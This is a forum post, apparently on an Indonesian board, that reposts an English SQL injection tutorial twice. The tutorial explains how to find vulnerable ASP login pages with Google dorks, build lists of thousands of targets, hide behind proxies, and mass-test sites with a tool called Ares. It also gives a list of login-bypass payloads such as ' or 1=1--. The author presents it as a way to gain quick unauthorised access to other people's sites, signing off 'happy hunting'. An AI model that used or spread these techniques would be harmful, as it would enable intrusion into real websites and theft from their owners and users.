Indeks
JurnalPencarian
Latest topics
SQL injection Basic Tutorial
Halaman 1 dari 1
211210
SQL injection Basic Tutorial
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i
have gathered plenty of injection strings for quite some time like
these below and have just been granted access to a test machine and will
be testing for many variations and new inputs...legally cool...provided
bymy good friend Gsecur aka ICE..also an Astal member.. [You must be registered and logged in to see this link.] "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact
i have compiled a combo list with strings like this to use on my chosen
targets ....there are plenty of strings about , the list below is a
sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and
so on...it dont have to be admin can be anything you want... the most
important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
[You must be registered and logged in to see this link.]
17,000 possible targets trying various searches spews out plent more
now
using proxys set in my browser i then click through interesting
targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
[You must be registered and logged in to see this link.]
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i
then save the list fire up Ares and enter (1) a proxy list (2)my target
IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit
back and wait...any target vulnerable with show up in the hits
box...now when it finds a target it will spew all the strings on that
site as vulnerable...you have to go through each one on the site by
cutting and pasting the string till you
find the right one..but the thing is you know you CAN access the site
...really i need a program that will return the hit with a click on url
and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
Sumber : [You must be registered and logged in to see this link.]
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
WHAT I DO :
first let me go into details on how i go about my research
i
have gathered plenty of injection strings for quite some time like
these below and have just been granted access to a test machine and will
be testing for many variations and new inputs...legally cool...provided
bymy good friend Gsecur aka ICE..also an Astal member.. [You must be registered and logged in to see this link.] "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact
i have compiled a combo list with strings like this to use on my chosen
targets ....there are plenty of strings about , the list below is a
sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and
so on...it dont have to be admin can be anything you want... the most
important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
[You must be registered and logged in to see this link.]
17,000 possible targets trying various searches spews out plent more
now
using proxys set in my browser i then click through interesting
targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
[You must be registered and logged in to see this link.]
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i
then save the list fire up Ares and enter (1) a proxy list (2)my target
IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit
back and wait...any target vulnerable with show up in the hits
box...now when it finds a target it will spew all the strings on that
site as vulnerable...you have to go through each one on the site by
cutting and pasting the string till you
find the right one..but the thing is you know you CAN access the site
...really i need a program that will return the hit with a click on url
and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
Sumber : [You must be registered and logged in to see this link.]
Admin- Admin
- Jumlah posting : 347
Points : -2145353246
Reputation : 8
Join date : 08.11.10
Age : 37
Lokasi : Surabaya -
Share this post on:
Similar topics» Tutorial Membuat Background Pada Flashdisk atau Folder Drive
» Sql Injection VULNERABLE SITES
» Tutorial MapInfo
» hacking Tutorial episode II 2010
» tutorial - membuat RADIO STATION
» Sql Injection VULNERABLE SITES
» Tutorial MapInfo
» hacking Tutorial episode II 2010
» tutorial - membuat RADIO STATION
Permissions in this forum:
Anda tidak dapat menjawab topik
» akhirnya terjawab sudah masalah saya
» solusi bau mulut, napas, kurus/obesitas, kerusakan rambut
» nulled CPA blaster
» Script Download Mp3 dari 4Shared [White Code]
» Backlink Pasang Ac Surabaya | Do follow blog - Infoac.info
» Backlink Service Ac Surabaya
» site:perawatanac.infoac.info
» Auto Approve - Bakclink September 2012
» pemesanan id betting online
» Dijual Segera Rumah Minimalis Siap Huni dan Hadap Timur | Surabaya
» Get Usernames And Passwords + Database By Google